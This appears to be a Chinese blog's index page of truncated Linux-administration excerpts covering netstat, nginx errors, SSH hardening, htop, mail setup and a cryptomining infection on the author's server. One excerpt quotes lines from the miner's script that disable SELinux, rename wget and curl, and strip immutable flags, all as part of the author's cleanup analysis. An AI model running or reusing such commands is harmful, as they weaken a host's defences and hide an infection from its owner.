访问服务器接口报警，浏览器中请求接口发现http请求一直在响应中，最后都执行出错。登录服务器负载内存数据都正常，但请求半天没有执行结果就感觉发送的请求服务器没有收到一样。查看nginx日志发现很多499错误，499错误的原因是客户端关闭了连接：https://www.04007.cn/article/360.html。客户端为什么关闭了连接呢？查看服务器端的连接情况，发现统计如下： [online@USER-04nginx]$sudonetstat-tnpawk'{print$6}'sortuniq-c 1 40493CLOSE_WAIT 3110ESTABLISHED 21FIN_WAIT1 37FIN_WAIT2 1Fo...[>>…]

    netstat命令是一个常用的非常有用的监控TCP/IP网络的的工具，今天在使用的时候又忘了它的选项，另外之前没有发现它还有一个-c选项，我在使用的时候还刷了好几把，今天再简单整理一下，先列出netstat的全部[选项] -a或--all：显示所有连线中的Socket； -A<网络类型>或--<网络类型>：列出该网络类型连线中的相关地址； -c或--continuous：持续列出网络状态； -C或--cache：显示路由器配置的快取信息； -e或--extend：显示网络其他相关信息； -F或--fib：显示FIB； -g或--groups：...[>>…]

    以下是一般公司运维部门进行服务器初始化后的服务器优化集合，认为比较有用，留着备用吧: #限定root用户不能通过ssh的登录方式 sudosed-i's/#PermitRootLoginyes/PermitRootLoginno/g'/etc/ssh/sshd_config #停用密码认证的登入方式，只允许密钥认证 sudosed-i's/#PubkeyAuthentication/PubkeyAuthentication/g'/etc/ssh/sshd_config #可以使用user/.ssh/key文件来验证 sudosed-i's/#AuthorizedKeysFile/AuthorizedKeysFile/g'/etc/ssh/sshd_config #不要这种GSSAPI认证方式，浪费时间 sudos...[>>…]

    可以使用命令top-H-p<pid>可以查看线程，不过有一个更好用的命令htop，htop算是top的升级版，top只能查看当前屏的数据，htop可以让你在垂直和水平方向上滚动，从而看到运行的所有进程，以及他们完整的命令行。    htop是Linux系统中的一个互动的进程查看器，一个文本模式的应用程序(在控制台或者X终端中)，需要ncurses。与Linux传统的top相比，htop在启动上比top更快，而且杀进程时不需要输入进程号，并且支持鼠标操作，支持颜色主题，总之htop更加人性化，centos...[>>…]

    之前我的阿里云服务器遭到XMR恶意挖矿病毒攻击,见文章https://www.04007.cn/article/562.html,今天有点时间就来准备看一下这个病毒shell文件shz.sh里面的具体内容，幸好看了，原来还有一个遗留病毒我没有解决。先看我下面列出的一些主要点： #!/bin/sh setenforce02>dev/null #第2行 echoSELINUX=desabled>/etc/sysconfig/selinux2>/dev/null #第3行 mv/usr/bin/wget/usr/bin/get #第15行 mv/usr/bin/curl/usr/bin/url #第16行 chattr-i/etc/shz.sh #第20行 #第35行 [[$cont=~"s...[>>…]

    服务器之前各shell脚本以及curl等东西运行的好好的，但这次中毒之后变得奇怪了，各种报错，执行curl,wget都提示命令不存在，wget方面我使用yum安装后又能正常。但yuminstallcurl安装也提示成功，但是安装成功后仍然是curl就是不行，通过下载一个版本的curl安装包编译安装成功，能查看Version,但就是执行curl时报错;curl:(2)Failedinitialization [root@04007~]#curl -bash:curl:commandnotfound #后通过wget下载安装包安装后，能查看到版本信息，但是curl报错curl:(2)Failedinitialization w...[>>…]

    最近阿里云服务器给我发报警短信，提示服务器：进程异常行为-可疑Host访问行为，但因为只是一个自己玩玩的服务器，有时一尽快也没当回事，试着访问了服务器还都正常，后来甚至有报警：恶意进程（云查杀）-挖矿程序，这有一天有空就上来看看，一看问题大了，整个服务器的定时任务被改写了，成了乱码，检查一下其它的东西到还正常，不过打开网站发现突然很慢了，不错，是中毒了，门罗币（XMR）挖矿程序。报警截图如下：登录服务器后，首先我查看了一下服务器各个文件夹近几天改过的文件，一看...[>>…]

    以前公司运维用来自动化服务器lnmp环境的shell脚本,这里没有mysql的，可能是我以前剪切掉了，mysql的看这篇文章吧：https://www.04007.cn/article/143.html整个里面的路径自己去完善一下，因为公司内用的是内网的资源路径，写在这里也没有用。在我的这个小站里搜索也都能搜索到下载路径。自动化部署脚本如下： #!/bin/bash mv/etc/yum.repos.d/CentOS-Base.repo/etc/yum.repos.d/CentOS-Base.repo.bak wget-O/etc/yum.repos.d/CentOS-Base.repohttp://mirrors.aliyun.com/repo/Centos-6.repo...[>>…]

    在之前一篇文章 https://www.04007.cn/article/539.html探讨了邮件发送里MUA与MTA之间的联系，通过mail或者mailx命令调用MTA（postfix,exim甚至sendmail等）执行发送都是可行的方案，但在执行的时候会发现一个情况，那就是发出去的邮件，在收件箱里显示的发件人都是服务器的用户名@主机名,并且使用postfix和exim时这个还不一样。这是postfix发送时的发件人信息：发件人：root<root@iZ2eretjiwZ.localdomain>这是exim发送时的信息，这个未带后面的.localdomain发件人：root<@iZ...[>>…]

    mail发送邮件应该是一个常用的东西，但是从简单的东西切入，也许你会有更多的收获。今天再看了看mail发邮件的东西，真的一个很小的知识点但要弄透不下功夫真的是不行的。先了解下面两个东西：邮件用户代理（MUA，MailUserAgent）邮件传送代理（MTA，MailTransportAgent）    还有一个MDA（邮件分发代理MailDeliverAgent）但一般我们接触不到吧，接触较多的都是MUA和MTA。所以MDA就不列在上面了。通俗的说MUA就是用户使用的客户端，而MTA则是真正发送邮件的发送进程，MUA...[>>…]